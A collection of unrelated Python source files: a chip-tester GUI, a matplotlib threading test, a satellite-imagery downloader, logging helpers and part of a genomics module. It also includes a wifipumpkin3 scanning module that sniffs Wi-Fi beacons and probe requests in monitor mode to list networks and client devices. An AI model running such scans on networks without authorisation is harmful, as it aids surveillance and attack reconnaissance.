def rowOfPin(self, pin):
if pin < (self.pins / 2):
return pin
else:
return self.pins - pin - 1
def pinPosV(self, pin):
return self.zifPosY + Zif.marginTop + (self.pitchVert * self.rowOfPin(pin))
def pinPosH(self, pin):
if pin < (self.pins / 2):
return Zif.zifPosX + Zif.marginSide
else:
return Zif.zifPosX + Zif.socketWidth - Zif.marginSide - Zif.pinWidth
def labelPosH(self, pin):
gap = 1
if pin < (self.pins / 2):
return Zif.zifPosX + Zif.marginSide + Zif.pinWidth + gap
else:
return Zif.zifPosX + Zif.socketWidth - Zif.marginSide - Zif.labelSize - Zif.pinWidth - gap
def selectorPosH(self, pin):
gap = 20
if pin < (self.pins / 2):
return Zif.zifPosX - Zif.selectorSize - gap
else:
return Zif.zifPosX + Zif.socketWidth + gap
def macros(self, master):
def macro(text, xoffset, y, code, fn=self.runTest):
def onClick():
if code:
for pin in sorted(self.pinCodes.keys()):
self.pinCodes[pin].set(code)
self.repaintPattern()
fn()
width = 60
xpos = Zif.zifPosX + self.socketWidth + 20 + (xoffset * width + xoffset * 5)
f = Frame(master, height=20, width=width)
f.pack_propagate(0) # don't shrink
f.pack()
f.place(x=xpos, y=y)
b = tk.Button(f, text=text, bg="bisque2", command=onClick)
b.pack(fill=BOTH, expand=1)
ypos = 0
macro("All 1", 0, ypos + 0, "1")
ypos = ypos + 21
macro("All 0", 0, ypos, "0")
ypos = ypos + 21
macro("All H", 0, ypos, "H")
ypos = ypos + 21
macro("All L", 0, ypos, "L")
ypos = 0
macro("All Z", 1, ypos, "Z")
ypos = ypos + 21
macro("All S", 1, ypos, "S")
ypos = ypos + 21
macro("All ?", 1, ypos, "?")
ypos = ypos + 21
macro("Identify", 1, ypos, None, fn=self.runIdentify)
def testButton(self, master):
def onClick():
self.runTest()
width = 60
xpos = Zif.zifPosX + 80
f = Frame(master, height=30, width=width)
f.pack_propagate(0) # don't shrink
f.pack()
f.place(x=xpos, y=2)
b = tk.Button(f, text="Test", bg="bisque2", command=onClick)
b.pack(fill=BOTH, expand=1)
def autoCheckbox(self, master):
xpos = Zif.zifPosX + 150
cb = tk.Checkbutton(master, text="Auto", height=1, width=3, bg="white", variable=self.autoTest)
cb.place(x=xpos, y=4)
def optionButtons(self, parent, x, y, pin):
def click():
self.repaintPattern()
if self.autoTest.get():
self.runTest()
f = Frame(parent)
f.pack_propagate(0) # don't shrink
f.pack()
f.place(x=x, y=y)
v = tk.StringVar()
v.set("?")
self.pinCodes[pin] = v
buttons = [
("1 input", "red3"),
("Vcc", "red3"),
("Clock input", "brown"),
(None, "white"),
("High output expected", "red3"),
("Z output expected", "black"),
(None, "white"),
("? active test", "blue"),
("0 input", "green"),
("GND", "green"),
("-", "white"),
(None, "white"),
("Low output expected", "green"),
("X don't care", "black"),
(None, "white"),
("S sample passive voltage", "blue"),
]
p = 0
for text, fg in buttons:
t = int(len(buttons) / 2)
row = int(p / t)
col = p % t
width = 16
if text is None:
width = 3
# mini frame needed to fix size of control
fb = Frame(f, height=18, width=width)
fb.pack_propagate(0) # don't shrink
fb.grid(row=row, column=col)
if text is not None and text != "-":
c = text[0]
b = tk.Radiobutton(fb, text=c, variable=v, value=c, indicatoron=0, anchor="c",
font=("courier", 8), command=click, fg=fg, bg="white", selectcolor="yellow", borderwidth=1)
CreateToolTip(b, text)
else:
b = tk.Label(fb, text="", bg="white")
b.pack(fill=BOTH, expand=1)
p = p + 1
def optionMenu(self, master, x, y, pin):
options = ["0 in", "1 in", "V in", "G in", "C in", "L expected", "H expected", "Z expected",
"X don't care",
"? test", "S sample"]
defaultOption = 9
width=Zif.selectorSize
height=Zif.selectorHeight,
f = Frame(master, height=height, width=width)
f.pack_propagate(0) # don't shrink
f.pack()
f.place(x=x, y=y)
if self.USE_v1_HACK and (pin == 0 or pin == 23):
o = Label(f, text="-", font=("courier", 9), background=Zif.surfaceCol, borderwidth=0, anchor="center")
o.pack(fill=BOTH, expand=1)
else:
def onClick(code):
self.repaintPattern()
if self.autoTest.get():
self.runTest()
variable = StringVar()
b = OptionMenu(f, variable, options[defaultOption], command=onClick, *options)
b["menu"].config(bg="white", font=("courier", 9), activebackground="cornflower blue", selectcolor="green")
b.pack(fill=BOTH, expand=1)
self.pinCodes[pin] = variable
def pinNumLabel(self, master, x, y, text, height, width, pin):
f = Frame(master, height=height, width=width)
f.pack_propagate(0) # don't shrink
f.pack()
f.place(x=x, y=y)
o = Label(f, text=text, font=("courier", 9), background=Zif.surfaceCol, borderwidth=0, anchor="center")
o.pack(fill=BOTH, expand=1)
self.pinNumLabels[pin] = o
def pin(self, master, x, y, height, width, pin):
f = Frame(master, height=height, width=width)
f.pack_propagate(0) # don't shrink
f.pack()
f.place(x=x, y=y)
pinLabelVariable = StringVar()
pinLabelVariable.set("")
o = Label(f, textvariable=pinLabelVariable, font=("courier", 9), background="#DDD", borderwidth=2,
relief="solid", anchor="center")
o.pack(fill=BOTH, expand=1)
self.pinLabels[pin] = pinLabelVariable
self.pinControls[pin] = o
def patternField(self, master):
f = Frame(master, width=self.patternWidth, height=Zif.patternHeight)
f.pack_propagate(0) # don't shrink
f.pack()
f.place(x=Zif.zifPosX, y=self.zifPosY + Zif.height + 20)
o = Entry(f, font=("courier", 9),
textvariable=self.testPattern, width=self.patternWidth,
justify=CENTER)
o.pack(fill=BOTH, expand=1)
def getPorts(self):
iterator = sorted(comports(include_links=False))
ports = []
for n, (port, desc, hwid) in enumerate(iterator, 1):
ports.append(port)
return ports
def portSelector(self, master):
gap = 30
f = Frame(master, width=Zif.socketWidth - (2 * gap), height=Zif.patternHeight)
f.pack_propagate(0) # don't shrink
f.pack()
f.place(x=10, y=2)
self.lastPorts = []
def repopulate():
ports = self.getPorts()
if ports != self.lastPorts:
self.portSelectorWidget.pack_forget()
self.portSelectorWidget = build()
self.lastPorts = ports
def build():
self.ports = self.getPorts()
b = OptionMenu(f, self.comPortVar, self.portSelectorPrompt, *self.ports)
b["menu"].config(bg="white", font=("courier", 9), activebackground="cornflower blue", selectcolor="green")
b.pack(fill=BOTH, expand=1)
return b
self.portSelectorWidget = build()
self.rebuildPortSelector = repopulate
def pinCountSelector(self, master):
def onClick(count):
validRows = count / 2
pcount = 0
for ipin in range(0, self.pins):
row = self.rowOfPin(ipin)
if self.USE_v1_HACK and (ipin == 0 or ipin == 23):
label = "-"
elif row <= validRows:
pcount = pcount + 1
label = str(pcount)
else:
label = "-"
self.pinNumLabels[ipin]["text"] = label
gap = 30
f = Frame(master, width=Zif.socketWidth - (2 * gap), height=Zif.patternHeight)
f.pack_propagate(0) # don't shrink
f.pack()
f.place(x=10, y=40)
ignored = IntVar()
self.ports = self.getPorts()
b = OptionMenu(f, ignored, "pin count", command=onClick, *self.pinCountOptions)
b["menu"].config(bg="white", font=("courier", 9), activebackground="cornflower blue", selectcolor="green")
b.pack(fill=BOTH, expand=1)
def repaintPattern(self):
pattern = ""
for pin in sorted(self.pinCodes.keys()):
code = self.pinCodes[pin].get()[0]
pattern = pattern + code
half = int(len(pattern) / 2)
split1 = pattern[0:half]
split2 = pattern[half: len(pattern)]
cut = split1 + "/" + split2
self.testPattern.set(cut)
def runTest(self):
port = self.comPortVar.get()
if port == "":
self.writeLog("Port not open yet\n")
return
pat = "t:" + self.testPattern.get()
self.arduinoInputQueue.put(pat)
def runIdentify(self):
port = self.comPortVar.get()
if port == "":
self.writeLog("Port not open yet\n")
return
self.arduinoInputQueue.put("i")
def paintResult(self, result):
self.writeLog("%s" % result)
if result.startswith("ERROR"):
showerror(title="Error Response", message=result)
elif result.startswith("RESULT"):
resp = result.replace("RESULT : ", "").strip()
for ipin in range(0, self.pins):
fg = "black"
code = resp[ipin]
incode = "-"
if ipin in self.pinCodes:
incode = self.pinCodes[ipin].get()[0]
if code == "-":
# not a pin
self.pinControls[ipin].configure(background="gray95", foreground=fg)
elif code == "_":
# was in input
code = incode
color = "white"
if code == "V": # was an assertion to not ok
fg = "red"
elif code == "G":
fg = "green"
elif code == "C":
fg = "blue"
elif code == "1":
fg = "red"
elif code == "0":
fg = "green"
self.pinControls[ipin].configure(background=color, foreground=fg)
elif code == ".":
# was ok
code = incode
self.pinControls[ipin].configure(background="pale green", foreground=fg)
else:
# might be ok cos this could be a "S" or "?"
color = "yellow"
if incode in "HLZ": # was an assertion to not ok
color = "red"
self.pinControls[ipin].configure(background=color, foreground=fg)
self.pinLabels[ipin].set(code)
def serialLoop(self):
serialPort = None
current = self.comPortVar.get()
if self.portSelectorPrompt == current:
self.writeLog("Port not open yet\n")
while True:
self.rebuildPortSelector()
try:
port = self.comPortVar.get()
if self.portSelectorPrompt == port:
time.sleep(0.1)
continue
if port != current:
current = port
if serialPort:
serialPort.close()
serialPort = None
else:
if serialPort is None:
self.writeLog("Connecting: %s\n" % port)
serialPort = serial.Serial(port, baudrate=57600, timeout=0.05)
# give arduino a chance to respond
time.sleep(0.1)
# reset queue
while not self.arduinoInputQueue.empty():
self.arduinoInputQueue.get()
l = serialPort.readline()
while len(l) > 0:
line = l.decode("utf-8")
self.paintResult(line)
l = serialPort.readline()
# only send one line at a time then process all responses
if not self.arduinoInputQueue.empty():
w = self.arduinoInputQueue.get()
self.writeLog(w.strip() + "\n")
serialPort.write(w.encode("utf-8"))
serialPort.write("\n".encode("utf-8"))
# wait for some response
while serialPort.in_waiting == 0:
time.sleep(0.05)
except BaseException as e:
if serialPort is not None:
self.writeLog("Disconnecting: %s\n" % str(e))
serialPort.close()
serialPort = None
else:
self.writeLog("No Connection: %s\n" % str(e))
time.sleep(2)
def main():
root = Tk()
root.title("Exploratory Tool")
ex = Zif(root)
ex.pack()
# root.geometry("600x450+150+150")
root.mainloop()
if __name__ == '__main__':
main()
|
threading_test.py
|
#! /usr/bin/python
"""
Test by Karen Tracey for threading problem reported in
http://www.mail-archive.com/matplotlib-devel@lists.sourceforge.net/msg04819.html
and solved by JDH in git commit 175e3ec5bed9144.
"""
from __future__ import print_function
import os
import threading
import traceback
import numpy as np
from matplotlib.backends.backend_agg import FigureCanvasAgg as FigureCanvas
from matplotlib.figure import Figure
thread_count = 8
max_iterations = 50
exception_raised = False
def png_thread(tn):
png_fname = 'out%d.png' % tn
vals = 100 + 15 * np.random.randn(10000)
i = 0
excp = None
global exception_raised
while not exception_raised and i < max_iterations:
i += 1
png_f = open(png_fname, 'wb')
try:
fig = Figure()
ax = fig.add_subplot(111)
ax.hist(vals, 50)
FigureCanvas(fig).print_png(png_f)
except Exception, excp:
pass
png_f.close()
if excp:
print('png_thread %d failed on iteration %d:' % (tn, i))
print(traceback.format_exc(excp))
exception_raised = True
else:
print('png_thread %d completed iteration %d.' % (tn, i))
os.unlink(png_fname)
def main(tc):
threads = []
for i in range(tc):
threads.append(threading.Thread(target=png_thread, args=(i + 1,)))
for t in threads:
t.start()
for t in threads:
t.join()
if not exception_raised:
msg = 'Success! %d threads completed %d iterations with no exceptions raised.'
else:
msg = 'Failed! Exception raised before %d threads completed %d iterations.'
print(msg % (tc, max_iterations))
if __name__ == "__main__":
main(thread_count)
|
multiproc_pydl.py
|
__copyright__ = """
Copyright 2019 Samapriya Roy
Licensed under the Apache License, Version 2.0 (the "License");
you may not use this file except in compliance with the License.
You may obtain a copy of the License at
http://www.apache.org/licenses/LICENSE-2.0
Unless required by applicable law or agreed to in writing, software
distributed under the License is distributed on an "AS IS" BASIS,
WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
See the License for the specific language governing permissions and
limitations under the License.
"""
__license__ = "Apache 2.0"
#!/usr/bin/env python
import multiprocessing
import os
import csv
import requests
import time
import progressbar
import json
import sys
from retrying import retry
from planet.api.utils import read_planet_json
from planet.api.auth import find_api_key
#Get Planet API and Authenticate SESSION
try:
PL_API_KEY = find_api_key()
except:
print('Failed to get Planet Key')
sys.exit()
SESSION = requests.Session()
SESSION.auth = (PL_API_KEY, '')
# To get redirect link
@retry(
wait_exponential_multiplier=1000,
wait_exponential_max=10000)
def check_for_redirects(url):
try:
r = SESSION.get(url, allow_redirects=False, timeout=0.5)
if r.status_code == 429:
raise Exception("rate limit error")
if 300 <= r.status_code < 400:
return r.headers['location']
else:
return 'no redirect'
except requests.exceptions.Timeout:
return '[timeout]'
except requests.exceptions.ConnectionError:
return '[connection error]'
########################################################################
class MultiProcDownloader(object):
"""
Downloads urls with Python's multiprocessing module
"""
#----------------------------------------------------------------------
def __init__(self, urls):
""" Initialize class with list of urls """
self.urls = urls
#----------------------------------------------------------------------
def run(self):
"""
Download the urls and waits for the processes to finish
"""
jobs = []
for url in self.urls:
process = multiprocessing.Process(target=self.worker, args=(url,))
jobs.append(process)
process.start()
for job in jobs:
job.join()
#----------------------------------------------------------------------
def worker(self, url):
"""
The target method that the process uses tp download the specified url
"""
try:
urlcheck=url.split('|')[0]
fullpath=url.split('|')[1]
[head,tail]=os.path.split(fullpath)
msg = "Starting download of %s" % fullpath.split('/')[-1]
if not os.path.exists(head):
os.makedirs(head)
os.chdir(head)
if not os.path.isfile(fullpath):
print(msg, multiprocessing.current_process().name)
r = requests.get(urlcheck)
with open(fullpath, "w") as f:
f.write(r.content)
else:
print("File already exists skipping "+str(tail))
except Exception as e:
print(e)
print('Issues with file: '+str(fullpath))
def funct(url,final,ext):
if not os.path.exists(final):
os.makedirs(final)
final = os.path.abspath(final)
urls=[]
response=SESSION.get(url).json()
print("Polling with exponential backoff..")
while response['state']=='running' or response['state']=='starting':
bar = progressbar.ProgressBar()
for z in bar(range(60)):
time.sleep(1)
response=SESSION.get(url).json()
if response['state']=='success':
for items in response['_links']['results']:
url=(items['location'])
url_to_check = url if url.startswith('https') else "http://%s" % url
redirect_url = check_for_redirects(url_to_check)
if redirect_url.startswith('https'):
local_path=os.path.join(final,str(os.path.split(items['name'])[-1]))
if ext is None:
urls.append(str(redirect_url)+'|'+local_path)
elif ext is not None:
if local_path.endswith(ext):
urls.append(str(redirect_url)+'|'+local_path)
else:
print('Order Failed with state: '+str(response['state']))
downloader = MultiProcDownloader(urls)
downloader.run()
#----------------------------------------------------------------------
if __name__ == "__main__":
funct(url=sys.argv[1],final=os.path.normpath(sys.argv[2]),ext=sys.argv[3])
# funct(url='https://api.planet.com/compute/ops/orders/v2/4ebfa89e-dc59-41cc-ad82-dbad2b5375b2',final=r'C:\planet_demo',ext='.zip')
# downloader = MultiProcDownloader(urls)
# downloader.run()
|
wifiscan.py
|
from wifipumpkin3.core.common.terminal import ModuleUI
from wifipumpkin3.core.config.globalimport import *
from wifipumpkin3.core.utility.printer import (
display_messages,
setcolor,
display_tabulate,
)
from random import randrange
import time, signal, sys
from multiprocessing import Process
from scapy.all import *
from wifipumpkin3.core.common.platforms import Linux
from tabulate import tabulate
# This file is part of the wifipumpkin3 Open Source Project.
# wifipumpkin3 is licensed under the Apache 2.0.
# Copyright 2020 P0cL4bs Team - Marcos Bomfim (mh4x0f)
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
# http://www.apache.org/licenses/LICENSE-2.0
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
PROBE_REQUEST_TYPE = 0
PROBE_REQUEST_SUBTYPE = 4
DOT11_REQUEST_SUBTYPE = 2
class ModPump(ModuleUI):
""" Scan WiFi networks and detect devices"""
name = "wifiscan"
options = {
"interface": ["wlxc83a35cef744", "Name network interface wireless "],
"timeout": [0, "Time duration of scan network wireless (ex: 0 infinty)"],
}
completions = list(options.keys())
def __init__(self, parse_args=None, root=None):
self.parse_args = parse_args
self.root = root
self.name_module = self.name
self.whitelist = ["00:00:00:00:00:00", "ff:ff:ff:ff:ff:ff"]
self.aps = {}
self.clients = {}
self.table_headers_wifi = [
"CH",
"SSID",
"BSSID",
"RSSI",
"Privacy",
]
self.table_headers_STA = ["BSSID", "STATION", "PWR", "Frames", "Probe"]
self.table_output = []
super(ModPump, self).__init__(parse_args=self.parse_args, root=self.root)
def do_run(self, args):
""" execute module """
print(
display_messages(
"setting interface: {} monitor momde".format(
setcolor(self.options.get("interface")[0], color="green")
),
info=True,
)
)
self.set_monitor_mode("monitor")
print(display_messages("starting Channel Hopping ", info=True))
self.p = Process(
target=self.channel_hopper, args=(self.options.get("interface")[0],)
)
self.p.daemon = True
self.p.start()
print(display_messages("sniffing... ", info=True))
sniff(
iface=self.options.get("interface")[0],
prn=self.sniffAp,
timeout=None
if int(self.options.get("timeout")[0]) == 0
else int(self.options.get("timeout")[0]),
)
self.p.terminate()
self.set_monitor_mode()
print(display_messages("thread sniffing successfully stopped", info=True))
def channel_hopper(self, interface):
while True:
try:
channel = randrange(1, 11)
os.system("iw dev %s set channel %d" % (interface, channel))
time.sleep(1)
except KeyboardInterrupt:
break
def handle_probe(self, pkt):
if (
pkt.haslayer(Dot11ProbeReq)
and "\x00".encode() not in pkt[Dot11ProbeReq].info
):
essid = pkt[Dot11ProbeReq].info
else:
essid = "Hidden SSID"
client = pkt[Dot11].addr2
if client in self.whitelist or essid in self.whitelist:
return
if client not in self.clients:
self.clients[client] = []
if essid not in self.clients[client]:
self.clients[client].append(essid)
self.aps["(not associated)"] = {}
self.aps["(not associated)"]["STA"] = {
"Frames": 1,
"BSSID": "(not associated)",
"Station": client,
"Probe": essid,
"PWR": self.getRSSIPacketClients(pkt),
}
def getRSSIPacket(self, pkt):
rssi = -100
if pkt.haslayer(Dot11):
if pkt.type == 0 and pkt.subtype == 8:
if pkt.haslayer(Dot11Beacon) or pkt.haslayer(Dot11ProbeResp):
rssi = pkt[RadioTap].dBm_AntSignal
return rssi
def getRSSIPacketClients(self, pkt):
rssi = -100
if pkt.haslayer(RadioTap):
rssi = pkt[RadioTap].dBm_AntSignal
return rssi
def getStationTrackFrame(self, pkt):
if (
pkt.haslayer(Dot11)
and pkt.getlayer(Dot11).type == DOT11_REQUEST_SUBTYPE
and not pkt.haslayer(EAPOL)
):
sender = pkt.getlayer(Dot11).addr2
receiver = pkt.getlayer(Dot11).addr1
if sender in self.aps.keys():
if Linux.check_is_mac(receiver):
if not receiver in self.whitelist:
self.aps[sender]["STA"] = {
"Frames": 1,
"BSSID": sender,
"Station": receiver,
"Probe": "",
"PWR": self.getRSSIPacketClients(pkt),
}
if "STA" in self.aps[sender]:
self.aps[sender]["STA"]["Frames"] += 1
self.aps[sender]["STA"]["PWR"] = self.getRSSIPacketClients(pkt)
elif receiver in self.aps.keys():
if Linux.check_is_mac(sender):
if not sender in self.whitelist:
self.aps[receiver]["STA"] = {
"Frames": 1,
"BSSID": receiver,
"Station": sender,
"Probe": "",
"PWR": self.getRSSIPacketClients(pkt),
}
if "STA" in self.aps[receiver]:
self.aps[receiver]["STA"]["Frames"] += 1
self.aps[receiver]["STA"]["PWR"] = self.getRSSIPacketClients(
pkt
)
def handle_beacon(self, pkt):
if not pkt.haslayer(Dot11Elt):
return
essid = (
pkt[Dot11Elt].info
if "\x00".encode() not in pkt[Dot11Elt].info and pkt[Dot11Elt].info != ""
else "Hidden SSID"
)
bssid = pkt[Dot11].addr3
client = pkt[Dot11].addr2
if (
client in self.whitelist
or essid in self.whitelist
or bssid in self.whitelist
):
return
try:
channel = int(ord(pkt[Dot11Elt:3].info))
except:
channel = 0
rssi = self.getRSSIPacket(pkt)
p = pkt[Dot11Elt]
capability = p.sprintf(
"{Dot11Beacon:%Dot11Beacon.cap%}\
{Dot11ProbeResp:%Dot11ProbeResp.cap%}"
)
crypto = set()
while isinstance(p, Dot11Elt):
if p.ID == 48:
crypto.add("WPA2")
elif p.ID == 221 and p.info.startswith("\x00P\xf2\x01\x01\x00".encode()):
crypto.add("WPA")
p = p.payload
if not crypto:
if "privacy" in capability:
crypto.add("WEP")
else:
crypto.add("OPN")
enc = "/".join(crypto)
self.aps[bssid] = {
"ssid": essid,
"channel": channel,
"capability": capability,
"enc": enc,
"rssi": rssi,
}
def showDataOutputScan(self):
os.system("clear")
self.table_output = []
self.table_station = []
for bssid, info in self.aps.items():
if not "(not associated)" in bssid:
self.table_output.append(
[info["channel"], info["ssid"], bssid, info["rssi"], info["enc"]]
)
display_tabulate(self.table_headers_wifi, self.table_output)
print("\n")
for bssid, info in self.aps.items():
if "STA" in info:
self.table_station.append(
[
info["STA"]["BSSID"],
info["STA"]["Station"],
info["STA"]["PWR"],
info["STA"]["Frames"],
info["STA"]["Probe"],
]
)
if len(self.table_station) > 0:
display_tabulate(self.table_headers_STA, self.table_station)
print(display_messages("press CTRL+C to stop scanning", info=True))
def sniffAp(self, pkt):
self.getStationTrackFrame(pkt)
if (
pkt.haslayer(Dot11Beacon)
or pkt.haslayer(Dot11ProbeResp)
or pkt.haslayer(Dot11ProbeReq)
):
if pkt.type == PROBE_REQUEST_TYPE and pkt.subtype == PROBE_REQUEST_SUBTYPE:
self.handle_probe(pkt)
if pkt.haslayer(Dot11Beacon) or pkt.haslayer(Dot11ProbeResp):
self.handle_beacon(pkt)
self.showDataOutputScan()
def set_monitor_mode(self, mode="manager"):
if not self.options.get("interface")[0] in Linux.get_interfaces().get("all"):
print(display_messages("the interface not found!", error=True))
sys.exit(1)
os.system("ifconfig {} down".format(self.options.get("interface")[0]))
os.system("iwconfig {} mode {}".format(self.options.get("interface")[0], mode))
os.system("ifconfig {} up".format(self.options.get("interface")[0]))
|
logging.py
|
"""Logging utilities."""
import asyncio
import logging
import threading
from .async import run_coroutine_threadsafe
class HideSensitiveDataFilter(logging.Filter):
"""Filter API password calls."""
def __init__(self, text):
"""Initialize sensitive data filter."""
super().__init__()
self.text = text
def filter(self, record):
"""Hide sensitive data in messages."""
record.msg = record.msg.replace(self.text, '*******')
return True
# pylint: disable=invalid-name
class AsyncHandler(object):
"""Logging handler wrapper to add a async layer."""
def __init__(self, loop, handler):
"""Initialize async logging handler wrapper."""
self.handler = handler
self.loop = loop
self._queue = asyncio.Queue(loop=loop)
self._thread = threading.Thread(target=self._process)
# Delegate from handler
self.setLevel = handler.setLevel
self.setFormatter = handler.setFormatter
self.addFilter = handler.addFilter
self.removeFilter = handler.removeFilter
self.filter = handler.filter
self.flush = handler.flush
self.handle = handler.handle
self.handleError = handler.handleError
self.format = handler.format
self._thread.start()
def close(self):
"""Wrap close to handler."""
self.emit(None)
@asyncio.coroutine
def async_close(self, blocking=False):
"""Close the handler.
When blocking=True, will wait till closed.
"""
yield from self._queue.put(None)
if blocking:
while self._thread.is_alive():
yield from asyncio.sleep(0, loop=self.loop)
def emit(self, record):
"""Process a record."""
ident = self.loop.__dict__.get("_thread_ident")
# inside eventloop
if ident is not None and ident == threading.get_ident():
self._queue.put_nowait(record)
# from a thread/executor
else:
self.loop.call_soon_threadsafe(self._queue.put_nowait, record)
def __repr__(self):
"""Return the string names."""
return str(self.handler)
def _process(self):
"""Process log in a thread."""
while True:
record = run_coroutine_threadsafe(
self._queue.get(), self.loop).result()
if record is None:
self.handler.close()
return
self.handler.emit(record)
def createLock(self):
"""Ignore lock stuff."""
pass
def acquire(self):
"""Ignore lock stuff."""
pass
def release(self):
"""Ignore lock stuff."""
pass
@property
def level(self):
"""Wrap property level to handler."""
return self.handler.level
@property
def formatter(self):
"""Wrap property formatter to handler."""
return self.handler.formatter
@property
def name(self):
"""Wrap property set_name to handler."""
return self.handler.get_name()
@name.setter
def name(self, name):
"""Wrap property get_name to handler."""
self.handler.name = name
|
bamprocess_regression.py
|
# Functions used by AcroPoly algorithm to process the bam file, scan the genomic region, get EM dosages and report them in the desired format.
# Written by Ehsan Motazedi, Wageningen UR, 21-01-2018.
# Last mofified: 08-09-2018.
import copy
import itertools
import math
import multiprocessing as mpthread
import numpy as np
import pysam
import re
import subprocess
import sys
import threading
from collections import OrderedDict
from cStringIO import StringIO
from genotypes import getAllelesPop, getGenotypesPop
from haplotypes import Haplotypes
from math import log
from reads import Read
#from scipy.misc import factorial as fact
MAXCORES = mpthread.cpu_count()-1 # Max number of available cores
NCORES = 8 # desired number of cores to use
logfactorial_table = {n: sum(log(_n) for _n in range(1,n+1)) for n in range(0,1001)}
Global_Sema = None # Global Semaphore not initialized yet
class BlockException(Exception):
def __init__(self, value):
super(BlockException, self).__init__(value)
self.args = (value,)
def __str__(self):
return "{}".format(':'.join(str(_arg) for _arg in self.args))
def __repr__(self):
return self.args
class Capturing(list):
"""class defined to temporarily redirect stdout and capture what is written in a list. To be used in 'with' statement block."""
def __enter__(self):
self._stdout = sys.stdout
sys.stdout = self._stringio = StringIO()
return self
def __exit__(self, *args):
self.extend(self._stringio.getvalue().splitlines())
del self._stringio # free up some memory
self._stdout.flush()
sys.stdout = self._stdout
def GetSemaLock(useglobal=True):
""" Return the semaphore and lock objects needed for multi threading."""
global NCORES
global MAXCORES
global Global_Sema
if min(NCORES, MAXCORES)>1:
if useglobal: # use a global semaphore
if Global_Sema is None:
Global_Sema = mpthread.BoundedSemaphore(min(NCORES, MAXCORES))
else: # use a local semaphore at each call to BranchPop
sema = mpthread.BoundedSemaphore(min(NCORES, MAXCORES))
lock = mpthread.Lock()
Parallel = True
else: # If parallel execution is not possible (as just one core could be used), concurrent execution is performed using threads.
if useglobal:
if Global_Sema is None:
Global_Sema = threading.BoundedSemaphore(NCORES)
else:
sema = threading.BoundedSemaphore(NCORES)
lock = threading.Lock()
Parallel = False
if useglobal:
return Global_Sema, lock , Parallel
else:
return sema, lock , Parallel
def thread_func(sema, lock, q, func, *args, **kwargs):
""" thread to call func with args and put the return value in q. """
_locked = False
try:
b = func(*args, **kwargs)
_locked = lock.acquire()
q.append(b)
except:
raise
finally:
if _locked:
lock.release()
sema.release()
class Infix:
def __init__(self, function):
self.function = function
def __ror__(self, other):
return Infix(lambda x, self=self, other=other: self.function(other, x))
def __or__(self, other):
return self.function(other)
def __rlshift__(self, other):
return Infix(lambda x, self=self, other=other: self.function(other, x))
def __rshift__(self, other):
return self.function(other)
def __call__(self, value1, value2):
return self.function(value1, value2)
mulx = Infix(lambda X, Y: [[sum(a*b for a,b in zip(X_row,Y_col)) for Y_col in zip(*Y)] for X_row in X]) # matrix multiplication |x|
def adjust_seq(read):
""" Adjust the read sequence according to the mapped positions, i.e. get read of the insertions and clipped bases."""
cig = list(_x for _x in re.split('[0-9]{1,}', read.cigarstring) if _x)
cign = list(_x for _x in re.split('[^0-9]', read.cigarstring) if _x)
cig = list(cig[_n]*int(cign[_n]) for _n in range(0, len(cig)))
cig = ''.join(_x for _x in cig if 'D' not in _x) # deleted nucleotides from the reference are not present in the read sequence
adj_seq=[]
for _n, _x in enumerate(read.seq):
if cig[_n]=='M': # Allow only match/mismatch of the read nucleotides, i.e. no clipping, no insertion.
adj_seq.append(_x)
return ''.join(adj_seq)
def frag_gen(varpos, allelelst, genolst, coordinates, nucleotides, qscores):
""" Generate SNP-fragments from (paired-end) reads."""
if (not coordinates) or (not nucleotides):
return Read(), {}
var_codes = []
var_num = []
var_q = []
for _n, _x in enumerate(varpos):
if _x < coordinates[0]:
continue
if _x > coordinates[-1]:
break
if _x in coordinates:
if set(genolst[_n].GetGenes()).intersection(set(['.','-'])): # Throw away missing genotypes or genotypes with one or more missing allele(s)
continue
#if len(set(genolst[_n].GetGenes()))<2: # Do not include in the SNP-fragments belonging to a population member its homozygous alleles
# continue
try:
var_codes.append(allelelst[_n][2][nucleotides[coordinates.index(_x)]])
var_num.append(allelelst[_n][0])
var_q.append(qscores[coordinates.index(_x)])
except KeyError: # if the called nucleotide is wrong, i.e. does not exist in VCF alleles
pass
return Read({_x:str(_y) for _x, _y in zip(var_num, var_codes)}), {_x:str(_y) for _x, _y in zip(var_num, var_q)} # return the reads {SNP number: allele} and the associated quality scores {SNP number: Qscore}
class InputError(Exception):
""" Handle invalid input specifications."""
def __init__(self, msg, *args):
super(InputError, self).__init__(args)
self.msg = msg
def __str__(self):
return "InputError: {}\n".format(self.msg)
def __repr__(self):
return (self.msg,)+self.args+('\n',)
def get_expectation(haplodict, M):
"""calculate the expected count of each possible haplotype within a window, using the current haplotype rate
estimates and the compatibility matrix M. Part of the EM-algorithm to get the expectation of the unknown counts
in the likelihood function for the reads: P(R|k_1,...,k_N,u_1,...,u_N) ~ Pois(k_1|lu_1)...Pois(k_N|lu_N) (with
l the length of the haplotyes in SNPs). Having M, the matrix showing copatiblity of reads (each read one row)
with the haplotype (each hapoltype one column, values of course 0 and 1), it is easy to calculate k_i assuming
a multinomial model for the assignment of each read. U is the vector of haplotype specific Poisson rates. Expected number of
each haplotype h_j,i.e. k_j, will be: sum over the reads (U_j.I(r_i|H_j) divided by the sum of U_k for h_k
compatible with r_i)."""
c = len(M) # total number of reads overlapping with the current region for the current sample
N = len(haplodict) # number of possible haplotypes for the region
count_dict = OrderedDict()
haplo_freq = [_u for _u in haplodict.values()]
frag_prob = np.transpose(np.dot(np.diag(haplo_freq), np.transpose(M)))
#frag_prob_norm = M |mulx| [[_f] for _f in haplo_freq] # sum of U_k for h_k compatible with r_i
frag_prob_norm = np.dot(M, [[_f] for _f in haplo_freq]) # sum of U_k for h_k compatible with r_i
frag_prob = [[frag_prob[_i][_j] / float(frag_prob_norm[_i][0]) for _j in range(0, N)] for _i in range (0, c)]
expectations = np.dot([[1 for _i in range(0,c)]], frag_prob)
for _j, _h in enumerate(haplodict.keys()):
count_dict[_h] = expectations[0][_j]
return count_dict
def get_frags(bamfile, vcffile, maxIS=3000, mbq=13, mmq=20, qoffset=33):
"""
Make the SNP-fragment list from a multi-sample bam file and its corresponding VCF file with input options: mmq, mbq, maxIS and qoffset.
Modified from the original version for read-based regression. Specifically, read length does NOT need to be at least 2 here, and homozygous sites of
individual are also included.
mmq : minimum read mapping quality to consider a read for phasing, default 20\n
